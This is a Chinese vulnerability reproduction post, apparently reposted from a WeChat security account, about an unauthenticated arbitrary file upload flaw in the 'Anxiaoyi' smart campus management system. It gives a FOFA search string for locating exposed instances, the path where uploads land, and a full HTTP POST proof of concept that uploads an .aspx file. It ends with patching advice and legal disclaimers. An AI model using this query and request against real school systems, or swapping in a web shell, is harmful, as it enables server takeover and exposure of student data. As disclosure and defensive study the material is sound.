一、漏洞简述
“安校易”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。其FileUpProductupdate.aspx接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传任意文件,进而控制服务器系统。
二、网络测绘
fofa:
body="login.aspx?action=GetOrgCardFormat"
三、漏洞复现
测试上传aspx文件
访问/Upload/Publish/000000/0_0_0_0/update.aspx
四、漏洞检测poc
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: 0.0.0.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 269
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="test.aspx"
Content-Type: image/jpeg
<%"C#"%><%Response.Write("test");System.IO.File.Delete(Request.PhysicalPath);%> Language=
------dqdaieopnozbkapjacdbdthlvtlyl--
五、漏洞修复
1、建议联系厂商打补丁或升级版本。
2、增加Web应用防火墙防护。
3、关闭互联网暴露面或接口设置访问权限。
免责声明
本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,由于传播、利用此文所提供的内容或工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关,本次测试仅供学习使用。如有内容争议或侵权,请及时私信我们!我们会立即删除并致歉。谢谢!
原文始发于微信公众号(实战安全研究):漏洞复现 | 智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞【附poc】
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论